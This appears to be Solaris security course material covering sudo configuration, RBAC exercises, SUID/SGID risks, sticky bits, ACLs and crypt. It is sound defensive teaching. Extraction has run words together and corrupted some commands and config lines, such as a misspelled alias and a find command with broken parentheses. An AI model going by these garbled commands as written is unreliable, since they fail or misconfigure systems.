Most sites with UNIX installations have multiple system administratorswith varying skill levels, and the different systems usually have differentroot passwords. With the sudo utility, you can give users access to only alimited set of commands, according to the role performed by the user. Forexample, a novice administrator can add, delete, or modify users, while amore experienced administrator can access backup , restore , andshutdown utilities—all without having access to the root password.

When you execute commands as the root user, no record of whatcommands were run is logged (unless auditing is switched on). The sudoutility keeps a log of all successful and unsuccessful sudo attempts,providing data to track who performed a given command at what time.The sudo utility can also write logging information to the syslogd file.

The sudo Utility


Using the sudo Utility

To execute a restricted command with sudo , the user enters sudo followedby the command to execute. The sudo utility checks the/usr/local/etc/sudoers file (described in “Configuring the sudoUtility” on page 7-24) to verify whether the user has permission toexecute the requested command. If the request is granted, the user isprompted for their own password. If the user enters the correct password,the command is executed. A user on the host can use the -l option to seewhich commands they can execute.

The sudo Utility


The example shown in Code 7-4 lists which sudo commands the currentuser can run. The command output includes a standard lecture compiledinto the sudo utility.

Code 7-4 Command and Output Showing Which Commandsthe Current User Can Run

1 $ sudo -l2 We trust you have received the usual lecture from the local System3 Administrator. It usually boils down to these two things:45 #1) Respect the privacy of others.6 #2) Think before you type.7 Password:8 You can run the following commands on this host:9 (root) /usr/sbin/shutdown

The sudo Utility


Introducing sudo Tickets

When users invoke sudo and enter the correct password, the systemgrants them a ticket for five minutes. Subsequent permitted commands donot require a password as long as the ticket remains valid. The ticket isrefreshed every time the sudo utility runs. The sudo ticket is associatedwith the user name of the current user (as opposed to the shell PID orterminal device name).

The following example lets this user run the shutdown command (nopassword prompt is issued because the sudo ticket is still valid):

$ sudo shutdown -g 5 -i 0 -yShutdown started. Thursday April 19 14:21:26 BST 2001

Note – The full directory path for the command must match thecommand name in the configuration file (see “Configuring the sudoUtility” on page 7-24). This helps prevent Trojan horse programs frombeing run inadvertently.

The sudo Utility


Configuring the sudo Utility

When the sudo utility is installed, the default behavior is that all non-rootusers are denied sudo privileges. You must explicitly allow any actionsyou want to permit for users. Do this by configuring the/usr/local/etc/sudoers file to define the rules you want to implement.

The sudoers file also contains aliases and defaults for the sudo utility.

The easiest way to edit the configuration file is to use the supplied visudoutility:

# visudo

which checks the syntax of the sudoers file when you exit.

The rules allow you to specify which commands users can execute onwhich hosts. You can define aliases for users, hosts, and commands tosimplify complex configurations.

The sudo Utility


The sudoers Format

The basic structure of a rule follows this format:

user host=commands [:host=commands] ...

where:

● user is the login ID of the user or alias or a group name if precededby a percent sign (for example, %nogroup ).

● host is the hostname or alias of the computer. This field allows asingle sudo configuration file to be created for the enterprise anddistributed to all hosts. Each host must have a copy of the sudoutility installed (sudo does not support remote execution ofcommands).

● commands is a comma-separated list of commands (or aliases) thatthe user can invoke using the sudo utility.

The sudo Utility


● Each command can be prefixed with a username in parentheses, toensure that the command runs as a specific user (this requires thatyou use the “-u ” option with the sudo command); by default allcommands run as the root user.

The only configured command in the default file is:

# User privilege specificationroot ALL=(ALL) ALL

This example allows root to run on ALL hosts as (ALL) users and ALLpossible commands (each ALL is an example of a standard alias).

An example of a command is:

bob wallace=/usr/sbin/shutdown

which allows the user bob to run the shutdown command on the hostwallace .

The sudo Utility


Using Aliases

Code 7-5, Code 7-6, and Code 7-7 on page 7-28 show the three types ofaliases:

Code 7-5 Simple Alias Definitions

1 Cmnd_Alias DOWN=/usr/sbin/shutdown,/usr/sbin/reboot2 Host_Alias WORKSTATIONS=grommit,wallace3 User_Alias ADMIN=alice,bob

Alias names must be specified in all uppercase letters. When an alias hasbeen defined it can be used just like a user, host, or command whenassigning sudo privileges. For example:

Code 7-6 Using Aliases

1 alice ALL=/usr/sbin/init2 bob penguin=DOWN3 ADMIN ALL=DWON

The sudo Utility


Aliases can include wildcards for commands and command linearguments. These are based on the shell file name generation characters.An exclamation mark (!) is a logical not operator, both in an alias and infront of a command. The example in Code 7-7 shows the use of both ! and* in an alias definition.

Code 7-7 Example: Wildcard Alias Definitions

1 Cmnd_Alias USERADMIN=/usr/sbin/user*, !/usr/sbin/userdel2 Cmnd_Alias PASSWD=/usr/bin/passwd [A-Z]*34 alice ALL=USERADMIN5 ADMIN ALL=PASSWD

This alias allows alice to run the /usr/sbin/useradd and/usr/sbin/usermod commands (and any other command beginningwith user in the /usr/sbin file) but not /usr/sbin/userdel . Any userin the ADMINalias can run the passwd command or a user whose loginname starts with a capital letter. For both rules, there are no restrictions onhosts.

The online manual page for sudoers lists several other examples.

The sudo Utility


Using Defaults

In addition to rules and aliases, the sudoers file can also specify defaultvalues for a large number of configurable items. The following commandlists all of the defaults available:

# sudo -L

The sudo Utility


The most useful defaults are the ones for logging (see “Logging sudoActivity” on page 7-31) but some others are worth considering, as shownin Table 7-3.

Table 7-3 Example Default Values

Default Values Meaning

Defaultssecure_path=/bin:/usr/bin:/usr/sbin:/usr/local/bin

Sets the PATH variable used bythe sudo commands to a safevalue. This protects againstusers having insecure PATHsettings and allows you tocontrol what commands can berun. Applies to all users.

Defaults:ADMIN !lecture Does not display the standardwarning banner when using thesudo command for users in theADMIN alias.

Defaults:alice!authenticate

Does not ask alice for thepassword (this is obviously nota very secure option toconfigure).

The sudo Utility


Logging sudo Activity

By default, the Sun freeware package for sudo does not define anylogging. You can enable logging to write to the Syslog daemon and to oneor more logging files.

The following default setting in the sudoers file enables logging tosyslogd as an auth entry:

Defaults syslog=auth

Successful sudo logins are flagged at notice priority and invalid logins atalert priority. A typical /etc/syslog.conf entry to add failed logins toa logging file would be:

auth.alert /var/adm/auth.log

The system logging facility is described in detail in Module 2, “UsingSolaris OE Log Files.”

The sudo Utility


You can also direct logging to a log file (not one of the Syslog files) byadding entries to the sudoers file:

Defaults logfile=/var/adm/sudo.logDefaults:ADMIN !logfile

This example enables logging for all users except those in the ADMINalias.

The sudo log contains the following information: date and time that sudowas executed; who executed sudo ; whether the user was privileged in thesudoers file to execute the command; and the command line that wasused.

Code 7-8 Example sudo Log

# cat /var/adm/sudo.logApr 19 11:54:15 : eve : user NOT in sudoers ; TTY=pts/4 ; PWD=/export/home/eve ; USER=root ; COMMAND=/usr/bin/suApr 19 14:45:14 : alice : TTY=pts/2 ; PWD=/export/home/alice ;

USER=root ; COMMAND=/usr/bin/shutdown

Note – The sudo utility also sends email to a named user (for example,the default root user) if an unauthorized user attempts to use sudo .

The sudo Utility


Security Implications of Using the sudo Utility

While the sudo utility has many advantages, it also has issues that systemadministrators should be aware of. If a sudo user password is broken byan intruder, the intruder will have access to the user’s sudo commands.

It is good practice not to give sudo users root access to every command(ALL) or at least any command that has shell escape features (such as vi )or a shell command. If users can escape to a shell, then any command thatis issued is run as root . Another problem is that sudo logging can beavoided by malicious users if they can escape from a shell while executinga privileged command from the sudo utility.

The sudo utility uses time stamp files to implement a “ticketing” system.When a user invokes sudo and enters the correct password, they aregranted a ticket for five minutes. (This time-out is configurable at compiletime.) Each subsequent sudo command updates the ticket for another fiveminutes.

The sudo Utility


The long timeout period creates the risk of accidentally leaving a rootshell where others can physically get to your keyboard.

Note – It is possible for another user to use the sudo command within thefive-minute time-out if the sudo user leaves the keyboard unattended.Therefore, sudo users should use the “sudo -k ” command to invalidatethe time stamp if they must leave the keyboard (but logging off would bebetter).

It is possible to reduce the ticket longevity using the sudoersconfiguration file. To switch off the ticketing feature so that the useralways has to enter a password, add the following line to the sudoers file:

Defaults timestamp_timeout=0

To prevent command spoofing, the sudo utility always checks the currentdirectory last when searching for a command, regardless of the position ofthe current directory in the user’s PATHenvironment variable (the currentdirectory must appear in the PATHfor this safety feature to take effect).However, the actual PATHis not modified and is passed unchanged to theutility that sudo executes.

The sudo Utility


Evaluating the sudo Utility

The following evaluation of the sudo utility, when compared with theRBAC appraisal given earlier, should aid you in deciding which is theappropriate tool for your environment.

The sudo utility stores its configuration information in a single file withbasic syntax. However, having all the information in one file can beconfusing.

The portability of the sudo utility makes it very attractive toadministrators working in a heterogeneous environment.

Each command must be prefixed with sudo and the full path name mustbe given. Korn shell aliases can help reduce the amount of extra typingrequired. For example:

alias usermod='sudo /usr/sbin/usermod'

Exercise: Controlling Root Access




● Install and configure the sudo utility

● Configure RBAC

Preparation

There is no preparation for this module.

Tasks


Task – Installing and Configuring the sudo Utility

You can download the sudo package from the Sun freeware Web site. Acopy has already been downloaded and saved in the /usr/local/pkgdirectory. Install this SVR4 package and then configure sudo so that:

● The user alice can run the useradd , usermod , and passwdcommands on all systems

● The user bob can run the usermod and passwd commands only onyour workstation

● Neither user can change the root password

● All sudo activity should be logged using the Syslog utility at authlevel and recorded in the log file /var/adm/sc300log

Make use of aliases in the sudo configuration file so that it is easy toextend your system by adding new users or granting new permissions.



Task – Configuring RBAC

Configure RBAC so that:

● The user alice can run the useradd , usermod , and passwdcommands

● The user bob can run the usermod and passwd commands

Use RBAC roles and profiles so it is easy to extend your system by addingnew users or granting extra commands to existing users.

Exercise Summary


Exercise Summary

?!


● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions


Exercise Solutions

Below are the solutions on how to:

● Install and configure the sudo utility

● Configure RBAC

Installing and Configuring the sudo Utility

1. Install the sudo package:

# cd /usr/local/pkg# pkgadd -d sudo-1.6.3p5-sol8-sparc-local

2. Look at documentation in the /usr/local/doc/sudo file or read themanual page (in /usr/local/man ):

# man sudo3. Edit the /usr/local/etc/sudoers file to contain:

# visudo

Defaultssyslog=auth

Cmnd_Alias PWD=/usr/bin/passwd [A-Z0-9a-z]*, !/usr/bin/passwd rootCmnd_Alias USERMOD=/usr/sbin/usermod,PWDCmnd_Alias USERADD=/usr/sbin/useraddHost_Alias WORKSTATION= <hostname>User_Alias ADMIN=aliceUser_Alias USERADMIN=bob

ADMIN ALL=USERMOD,USERADDUSERADMIN ALL=USERMOD

root ALL=(ALL) ALL

4. Update the /etc/syslog.conf file to include the following line (thisline should be there from the exercises in Module 2, “Using SolarisOE Log Files”):

# vi /etc/syslog.conf


5. Test your configuration.

Exercise Solutions


Configuring RBAC

1. Create a profile for the two required command sets by adding thefollowing lines to the /etc/security/exec_attr file:

Passwords:suser:cmd:::/usr/bin/passwd:uid=0User Add:suser:cmd:::/usr/bin/useradd:euid=0User Mod:suser:cmd:::/usr/bin/usermod:euid=0

2. Add the following lines to the /etc/security/prof_attr file tocomplete the profile definitions:

Passwords:::Change passwords:User Add:::Add new users:User Mod:::Modify exising users:

3. Create two new roles, giving each a profile Korn shell and a validpassword. One role should allow profiles UserMod and Passwords ,and the other a UserAdd :

# roleadd -P UserMod,Passwords -s /usr/bin/pfksh UserMod# passwd UserMod...# roleadd -P UserAdd -s /usr/bin/pfksh UserAdd# passwd UserAdd...

4. Allocate the required roles to the alice and bob users by runningthese commands:

# usermod -P All, -R UserAdd,UserMod alice# usermod -P All, -R UserMod bob

5. Test your changes, ensuring that the user alice can use the sucommand to assume either role but the user bob can only use the sucommand to assume the UserMod role. From within the profiles,ensure that alice can add a user and bob can modify a user.

6. Finally, reassure yourself that you cannot login as a profile user (usetelnet to reconnect to your workstation).


Module 8

File System Attacks

Objectives


● Set secure file permissions and ownerships

● Describe the security implications of using set-user-id (SUID)programs

● Describe the security implications of setting sticky bits on directories

● Configure and use access control lists (ACLs)

● Encrypt data using the crypt command

● Describe the security implications of device files

● Describe common security issues with backup and restore strategies

Relevance


Relevance

?!

Discussion – Protecting file systems and system resources from invasionand damage requires constant vigilance. Consider the following questions:

● How can files and directories be protected from unwanted attacks orunauthorized access?

● How can you increase the security on file systems and directorieswhile still allowing selected users the access they need?

● When it appears that set-user-id (SUID) programs are causingsecurity problems, how can you remedy the situation?


File System Attacks 8-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C



● Garfinkel, Simson, and Gene Spafford. Practical UNIX & InternetSecurity. O’Reilly & Associates, Inc., 1996.

● Farrow, Rik. UNIX System Security. Addison Wesley, 1991.

● Online manual pages for chmod(1) , getfacl(1) , and setfacl(1)

Guidelines for Setting Up the root Partition



A key security requirement for a Solaris OE is to protect the root filesystem from overflow and subsequent Denial of Service (DoS). Protect theroot file system by separating slices or partitions for all directories thatare writable by ordinary users. At the very least, mount the followingdirectories on separate disk slices or partitions:

● /tmp

● /var

● /export/home (and any other user home directories)

Consider putting the following directories under /var onto separate slicesor partitions to protect the administration information (such as log files):

● /var/spool

● /var/tmp

● /var/news (if you are running the news server)



Preventing Users From Filling the /tmp File

A simple DoS attack is when a user creates a large file in the /tmpdirectory. This prevents any utility that needs to write to this directoryfrom running. This problem is made worse if the tmp directory is part ofthe root partition or mounted on the swap partition. More often,problems with the /tmp directory filling are accidental. Often, files arecreated in /tmp (by users and system administrators alike) and forgotten.

To minimize DoS problems caused by limited space on /tmp , use one ofthe following methods:

● Enable quotas on the /tmp directory if it is mounted as a standardUNIX file system (UFS) so that no single user can fill up more than40 percent of the file system

● Monitor the free space on the /tmp directory with a script that runsregularly

● Mount the /tmp directory on its own partition rather than swapspace which might affect system performance if large numbers oftemporary files are used (such as during compilation)



Using Temporary File Systems

It is not only the /tmp directory that can be mounted on the swap space.To enhance the performance of applications that involve large numbers oftemporary files, it is sometimes appropriate to create a pseudo file systemcalled a temporary file system, or tmpfs . It is termed temporary becausethe files and data in it are not retained when the system is rebooted.

Temporary file systems reduce the time-intensive resources needed tocreate and destroy files, because the file creation and destruction istypically performed in memory rather than on the disk. Compiling a C++program is an example of a process which creates and deletes largenumbers of temporary files. Compilation time is greatly reduced using atemporary file system.

If you have a temporary file system, be aware that it uses the system swapspace for storage. If the contents of the temporary file system increase,you will see a proportional loss of available swap space. Wheninvestigating the lack of swap space, consider temporary file systems aspossible culprits.



To find out which file systems are mounted on the swap space, use thedf-F command, as shown in Code 8-1.

Code 8-1 Finding Out Which File Systems Are Mounted onthe Swap Space

# df -k -F tmpfsFilesystem kbytes used avail capacity Mounted onswap 690752 8 690744 1% /var/runswap 690752 8 690744 1% /tmp



Preventing DoS Due to Limited Swap Space

Swap space stores process memory images when they are paged orswapped out of main memory. The reduced cost of memory has reducedthe need and importance of swap space, and many performance-criticalsystems are configured to ensure that processes are never swapped.

It is more common to find swap space used on systems that are used fordevelopment or for testing. If the system runs out of swap space, then newprocesses cannot run, which creates a DoS situation. An intruder can forcethis DoS by creating a large number of processes, each of which requireshuge amounts of memory.

Note – It is much easier for an intruder to create and run memory-hungry programs if you leave a C/C++ program or any other languagecompiler on the system.

If you run out of swap space, first assess whether the cause is accidental ormalicious intent. To determine which processes are using a lot of swapspace, use the ps , prstat , stdtprocess , or top commands to displayprocess memory usage and paging activity.



If you run out of swap space because valid processes have used up allavailable space, add additional swap space using the swap command. Usethe mkfile command to create the file and preallocate disk space to it. Forexample:

# mkfile 50m /export/home/swapfile# swap -a /export/home/swapfile

increases the size of swap by 50 Mbytes (although this incurs the loss ofusable file space).

Note – This is not a permanent solution, and the swap space returns toits original size on reboot. To permanently allocate the extra swap space,add the new swap file to the /etc/vfstab directory and designate the filesystem type as swap:swap - /export/home/swapfile swap - no -

If rogue processes are using the swap space, use the kill command toterminate them. Then consider using the ulimit command to restrict theamount of virtual memory a user’s process can use.

For the Bourne shell or Korn shell, add the following line to the/etc/profile file to put a hard limit of 250 Kbytes on the amount ofvirtual memory a process can use:

# ulimit -Hv 250

Setting File System Permissions for Security



Setting file and directory permissions is one of the most basic ways toenforce security on a system. Permissions on files and directories allowusers to control who can access their files or directories for reading,writing, searching, and executing.

File ownership and access controls are sometimes the final defense againstintruders that have already breached other security protections. So thesubject is worth reviewing when considering security.

Access is controlled by the file’s mode bits, also known as permission bits.The three basic types are:

● read – The file or directory can be opened and read.

● write – The file or directory can be opened and written to. Writedoes not imply read.

● execute – Compiled program files can be executed and directoriescan be searched.

There are slightly different meanings to these bits for directoriescompared to all other types of files.



Files Permissions

The file permissions are:

● read – The file can be opened and read. Read implies a file can becopied.

● write – A file can be overwritten from any point or new dataappended to the file. Write does not imply read, so existing file datacannot be read and then modified. Write does not imply a file can bedeleted (see “Directory Permissions” on page 8-12).

● execute – Compiled program files can be executed. Executable filesdo not require read permission but shell script files need both readand execute permissions.



Directory Permissions

The directory permissions are:

● read – The directory can be opened and read. For directories, thismeans file names can be listed, but the files cannot be accessed(because the i-node cannot be read).

● write – A directory can be updated. This means that files can becreated, deleted, or renamed regardless of the permissions on the fileitself. The ability to remove a file is not controlled by the file’spermissions, but by the permissions of the directory containing thefile.

● execute – A directory can be searched, giving access to the fileswithin the directory.



Permission Categories

Three sets of permission bits exist for user, group, and others. The rulesfor determining file access are:

● One set controls the access of the owner of the file.

● One set controls the access for the members of a group.

● One set controls the access for all other users.

It is possible for users to set permissions that would deny themselvesaccess to their own files while granting open access to the rest of theworld. It is a common mistake to believe that there is an implied hierarchybetween owner, group, and others with regard to file and directorypermissions.



Review the following rules that describe how file access is determined:

● If the user is the owner of the file, then only the owner permissionbits are considered.

● If the user is not the owner, but is a member of the group owning thefile, then only the group permissions are considered.

● If the user is neither the owner nor the group owner, then only theother permissions are considered.



Review File Permissions

Test your understanding of the UNIX file permissions by studying thesystem output shown in Code 8-2, and answering the questions onpage 8-15.

Code 8-2 UNIX File Permissions

alice$ id -auid=102(alice) gid=10(staff) groups=10(staff),1(other)

bob$ id -auid=103(bob) gid=1(other) groups=12(sysadmin),1(other)

alice$ ls -al worktotal 4drwxrwxr-x 2 alice other 512 Jul 5 15:37 .drwxr-xr-x 3 alice other 512 Jul 5 15:34 ..-rw-r--r-- 1 alice staff 0 Jul 5 15:34 file1-r--r--r-- 1 bob other 0 Jul 5 15:36 file2-rw------- 1 bob sysadmin 0 Jul 5 15:37 file3-rw--w--w- 1 alice staff 0 Jul 5 15:36 log



1. Which files can alice read?

2. Which files can bob read?

3. Which files can alice write?

4. Which files can bob write?

5. Which files can alice delete?

6. Which files can bob delete?

7. What use are the odd permissions on the file log ?



Implications of Lax Permissions

Allowing files to have wider access permissions (that is, with morepermission bits set) than is required can constitute a security risk. Thecommon problems with lax permissions are:

● A loss of confidentiality that leads to data theft or privacy violation.

● They leave “holes” in the file system that allow back doors andTrojan horses to be created.

● There are more opportunities for intruders to instigate DoS attacks.

● Information can be gleaned that can later be used to mount an attackon this and other systems.



Preventing Lax Permissions Using the umask Setting

The UNIX file-creation mask, called umask, can set the default filepermissions for newly created files. A process inherits its umask settingfrom the parent process so, to be fully effective, the umask setting shouldbe set for the login process. With the Solaris OE, you do this by setting theumask in the /etc/default/login file.

The umask setting, as its name implies, is a bitwise and mask that isapplied to the file permissions, and which specifies those permissions youdo not want set when a file is created. With umask set to 0 the defaultfile-creation mode is:

● -rw-rw-rw- or octal 666 for a text file

● -rwxrwxrwx or octal 777 for a directory or executable file



In the Solaris OE, by default, the umask is set to octal 022 in the/etc/profile file. This has the effect of subtracting the write permissionfor group and the world as follows:

● -rw-r--r-- or octal 644 for a text file

● -rwxr-xr-x or octal 755 for a directory or executable file

Historically, this umask setting was chosen to encourage file sharingbetween users.

If these defaults are not restrictive enough for your environment, considersetting the umask to octal 077. This ensures that only the owner of the filehas any access to it.

Although setting the umask is a useful for keeping file systems secure, it isnot sufficient to rely on your umask setting. There is nothing to preventyou or your users from changing the file permissions after the file hasbeen created, and users can change the umask setting in their .profilefile.

Checking File Permissions

Using the umask setting to reinforce your file permission policy is thefirst-line defense against file system attacks. The second-line defense is tocheck the file system for file permission discrepancies.

Module 9, “Auditing File Systems” describes how to use file digests, theSolaris OE Fingerprint Database, and the third-party tool TripWire tocheck file system permissions (and much more). At the very least, it isgood practice to use the find command to obtain a list of files that areworld-writable, and change the permissions on any of these files ordirectories as necessary. The following find commands print out all filesthat are world-writable:

# find / -perm -o=w -print# find / -perm -002 -print

It is particularly important that system startup or configuration filesshould not be world-writable.

Set-User-ID and Set-Group-ID Files



Sometimes users must have special permissions to accomplish certaintasks such as editing the password file to change their password. If yougive the user write permission to the /etc/passwd and /etc/shadowfiles, there will be security implications. Instead, the user can run thepasswd program which runs with the authority of the superuser but limitswhat the normal user can accomplish. In this case, the passwd programprevents the user from changing anyone else’s password.

For a program to take on another user’s effective UID, an extrapermission bit must be set and owned by the effective UID user. The extrabit is called the set-user-id bit (SUID). Similarly, a program can take on adifferent effective GID. A program can be both an SUID and an SGID atthe same time.

Whether the program controls the user identity or the group identity, thesame potential security threat exists. For example, a user can become thesuperuser simply by running a SUID copy of the Korn shell(/usr/bin/ksh ) that is owned by the root user.



This is a fundamental security issue in UNIX, and identifying andsecuring SUID and SGID programs is necessary to prevent potentialattacks on your systems.

You should closely monitor the behavior of compiled programs that haveSUID or SGID privileges. Only install new SUID programs if absolutelynecessary, and then only after you have:

● Reassured yourself of the credentials of the source of the program

● Tested it thoroughly on a stand-alone system

Although compiled programs can be altered by intruders, this is not asimple task. However, shell scripts provide an open invitation for attack.With regard to SUID and SGID shell scripts, the security solution issimple:

● Never install SUID or SGID shell scripts.

● Check file systems regularly for SUID and SGID shell scripts andremove them.

Note – The Bourne shell (/bin/sh ) does not support SUID or SGIDsemantics on shell scripts unless the -p option is specified on thecommand line when the shell is invoked. This option is not normally setfor a login shell.



Identifying and Changing SUID and SGID Bits

You can identify SUID and SGID programs in a directory listing becausethey have an “s” where the “x” for execute would usually be found. Forexample, the following file has both the SUID and SGID bit set:

-r-sr-sr-- 4 root sys 101744 Jan 1 2000 /bin/passwd

Use the chmod utility to set or clear these bits. To clear the SUID bit, use:

$ chmod u-s file

To clear the SGID bit, use:

$ chmod g-s file

Use the find command with the following options to locate all SUID andSGID files on your system. Better yet, incorporate these commands into ascript that runs on a daily basis:

# find / $ -perm -u=s -o -perm -g=s $ -type f -print



This command prints out all plain file types with the SUID or SGIDpermissions set.

The ncheck program prints a list of each file on a block special device (ifno device is specified, the contents of the /etc/vfstab file generate a listof block special devices) along with its corresponding inode number.Used with the -s option, the ncheck program prints only special files andfiles with SUID mode. Use this to detect SUID or SGID programs. Forexample, Code 8-3 checks for special files on the root partition.

Code 8-3 Checking for Special Files on the root Partition

# ncheck -s /dev/dsk/c0t0d0s0/dev/dsk/c0t0d0s0:44213 /usr/lib/uucp/remote.unknown44215 /usr/lib/uucp/uucico44222 /usr/lib/uucp/uusched44223 /usr/lib/uucp/uuxqt44241 /usr/sbin/static/rcp...

Setting Sticky Bits and SGID on Directories



There are two permission bits with special meaning to directories:

● Sticky directories (drwxrwxrw t )

● SGID directories (drwxrw sr-t)

They make the files stored in those directories more secure. The followingsections discuss these permission bits.



Using Sticky Directories

Although the sticky bit is redundant with regard to files1, the Solaris OEstill makes use of this bit for directories. Administrators can use it toprotect a user’s files without having to give the user special privileges inan otherwise public directory. With the sticky bit set on a world-writabledirectory, users can create, rename, and delete their own files, but cannotrename or delete files owned by other users.

With a directory sticky bit set, a user can only delete a file from thedirectory if one of the following is true:

● The user owns the directory and can write to the directory.

● The user owns the file and can write to the directory.

● The user is the superuser.

1. The original use of the sticky bit was to reduce the overhead of swapping inand out of frequently run programs by marking the memory pages so that theywere less likely to be overwritten if they were not actually in use.



The commands in Code 8-4, which can only be issued by the superuser,reset the normally wide-open permissions of the /tmp directory to protectan individual user’s files from malicious or accidental damage by others.

Code 8-4 Resetting Permissions

# cd /# ls -ld tmpdrwxrwxrwx 6 sys sys 320 Jun 11 08:43 tmp# chmod +t /tmp# ls -ld tmpdrwxrwxrw t 6 sys sys 320 Jun 11 08:43 tmp

The appearance of the “t ” character instead of the “x” character in theexecute position for other users shows that the sticky bit is set.



Setting SGID Directories

A file created in a directory with the SGID bit set has the same group asthe directory. Without the SGID bit set, the file acquires the effective GIDof the user creating the file.

SGID directories are most useful for small projects where users store filesin a shared directory. The SGID bit ensures that all files stored in thedirectory belong to the same group. As long as the file is created withgroup read permissions, and all project members are in the same group,there should be no problems with project members being unable to readsome of the files. Correct use of umask is necessary for SGID on directoriesto work effectively.



As long as the users are administered securely, there should be noadditional security implications in using SGID on directories.

Code 8-5 Using SGID on Directories

alice$ ls -al worktotal 4drwxrw sr-t 2 alice other 512 Jul 5 15:37 .drwxr-xr-x 3 alice other 512 Jul 5 15:34 ..-rw-r--r-- 1 alice other 0 Jul 5 15:34 file1-r--r--r-- 1 bob other 0 Jul 5 15:36 file2-rw-r--r-- 1 bob other 0 Jul 5 15:37 file3-rw--w--w- 1 alice other 0 Jul 5 15:36 log

Securing Files Using Access Control Lists



Basic permissions of read, write, and execute for owners, groups, andothers are usually sufficient for the protection of most files and directories.However, you might need to include or exclude particular users or groupsfrom file access. Access Control Lists (ACLs) provide a finer level of accesscontrol which can be beneficial for small, collaborative projects.

ACL entries are the way to define an ACL for a file. ACL entries are setusing the setfacl command and examined using the getfacl command,both of which are described in the following section.

Many UNIX systems have added ACLs to a file or directory to equipusers with a more-specific means of controlling access to their files.Unfortunately, this control is implemented using different commands,syntax, and behavior according to which version of UNIX is being used.This discussion of ACLs is limited to the Solaris OE implementation.ACLs were not available with the Solaris OE prior to the 2.5.1 release.



Caution – Because ACLs are not standard across different types of UNIXsystems, they do not work in a heterogeneous environment. Any files anddirectories exported to pre-Solaris 2.5.1 or non-Solaris clients using NFSshould be fully protected with the standard UNIX file permissions.ACLs are supported on UFS file systems only. This means that if you copyfiles onto a non-UFS file system (such as a tempfs ), the ACL entries willbe lost.



Using the getfacl and setfacl Commands

To examine the ACL for a file, use the getfacl command. In the exampleshown in Code 8-6, the ls -l command lists the basic permissions on aregular text file. Next, the getfacl command displays the extendedpermissions, even though none have yet been added.

Code 8-6 Listing Basic Permissions on a Regular Text File

$ ls -l my_text-rw------- 1 fred staff 22 Jun 12 15:10 my_text$ getfacl my_text# file: my_text# owner: fred# group: staffuser::rw-group::--- #effective:---mask:---other:---



With no specific ACL set, the getfacl command reports the standardUNIX permissions for user, group, and other. The mask permission is alsoset – which acts as a filter on the default permissions. The mask works ina similar way to the umask utility. The mask performs a bitwise logicalAND with the standard permissions, the result of which is the effectivepermissions. Where the mask setting modifies the permissions, theeffective permissions are reported.



Maintain ACL entries with the setfacl command options:

● -m to modify settings

● -s to set all settings

● -d to delete a setting

● -r to recalculate the mask (always use unless setting the maskexplicitly)

All options accept a comma separated list of ACL entries.

Each entry is category :permissions :

$ setfacl -r -m u:groucho:rw-,g:marxbros:r-- my_text



To add extended permissions to existing basic permissions, use thesetfacl command with an -m (modify) option. In the following example,read and write permissions are added for user groucho , and readpermissions are added for group marxbros :

$ setfacl -m u:groucho:rw-,g:marxbros:r-- my_text$ ls -l my_text-rw-------+ 1 fred staff 22 Jun 12 15:10 my_text

When you use the ls -l command, notice that there is now a “+”character appended to the basic permissions list, indicating that an ACLnow exists on the file. The getfacl command displays the details of theextended permissions that were applied (see Code 8-7).

Code 8-7 Using the getfacl Command

$ getfacl my_text# file: my_text# owner: fred# group: staffuser::rw-user:groucho:rw- #effective:---



group::--- #effective:---group:marxbros:r-- #effective:---mask:---other:---

You might expect that user groucho could now read and write tomy_text , but this is not the case. As mentioned earlier, the mask bits mustbe set with the maximum mask permissions needed for any user who wasadded to the control list. To make the extended permission modificationseffective, use the -m option to set the mask (see Code 8-8).

Code 8-8 Using the -m Option

$ setfacl -m mask:rw- my_text$ getfacl my_text# file: my_text# owner: fred# group: staffuser::rw-user:groucho:rw- #effective:rw-group::--- #effective:---group:marxbros:r-- #effective:r--mask:rw-other:---

There is also an -r option to the setfacl command, which automaticallysets the mask to the widest permissions required to make the ACL entrieseffective.

User groucho can now read and write the my_text file. The lesson to belearned here is that whenever the -m option modifies the control list, usethe -r option to recalculate the mask to make the change effective.

Instead of making incremental changes to the control list, it might bepreferable to replace the entire list of settings using the -s option. Becauseall of the settings are being replaced, you must specify the basicpermissions, the mask settings, and the extended permissions to thecommand, as shown in Code 8-9.

Code 8-9 Replacing the List of Settings

$ ls -ltotal 2-rw------- 1 fred staff 9 Jun 16 08:53 my_text$ setfacl -s u::rw-, g::---, o:---, m:rw-,\

u:groucho:rw, g:marxbros:r-- my_text



$ ls -ltotal 2-rw-------+ 1 fred staff 9 Jun 16 08:53 my_text$ getfacl my_text# file: my_text# owner: fred# group: staffuser::rw-user:groucho:rw- #effective:rw-group::--- #effective:---group:marxbros:r-- #effective:r--mask:rw-other:---



Deleting ACL Entries

You can delete users from an ACL using the setfacl -d command. Forexample, to remove special permissions for groucho , use:

$ setfacl -d u:groucho my_text

Note – When a user is removed from the system, the user’s UID stillappears in any ACL where the user has an entry. If the UID is reused, thenew user gains access to those files controlled by the ACL. If ACLs areused on your system, in addition to removing all files belonging to adeleted user, you should also remove the user from every ACL entry. Dothis using the command setfacl -d u: old_UID on every file. Forexample:# find / -print | xargs setfacl -d u: old_UID

Encrypting Data


Encrypting Data

If an intruder has broken into your system and obtained superuserprivileges, most of your system defenses have been broken and youshould take extreme measures to resecure the system.

However, there is one last line of defense that can prevent intruders fromviewing sensitive information—encryption. There are many differenttypes of encryption with widely varying levels of security. The subject ofcode making and code breaking is vast, and this module covers only afew aspects.

Encrypting Data


The crypt Command

The crypt command is a utility for encrypting data. This utility issupplied on every UNIX machine. This command uses a symmetric key (apassword or phrase), input to an encryption algorithm, which encrypts afile into a coded form. The same password or phrase decrypts the file backto its original form.

For example, you are asked to help protect a list containing salary data orcompany employees. Your own salary data is included on this list. Thechief financial officer wants to store this file on a local system and wantsto keep it secret, even from you. You can recommend the use of the cryptcommand because the chief financial officer does not have to reveal thekey to you, and encryption provides a level of security that preventscasual access to the data.

To encrypt a file named salaries using the crypt command and thepassword of swordfish , enter:

$ crypt swordfish < salaries > salaries.encrypted

Encrypting Data


You should delete the original plain text file named salariesimmediately following this command and clear the screen so that thepassword cannot be read by a passerby. The file, salaries.encrypted , isnow in an unreadable format.

To restore the encrypted file to its readable format, repeat the cryptcommand using the swordfish key, redirecting input from the encryptedfile and redirecting standard output to a new file. In this example, theunencrypted file is new_salaries .

$ crypt swordfish < salaries.encrypted > new_salaries

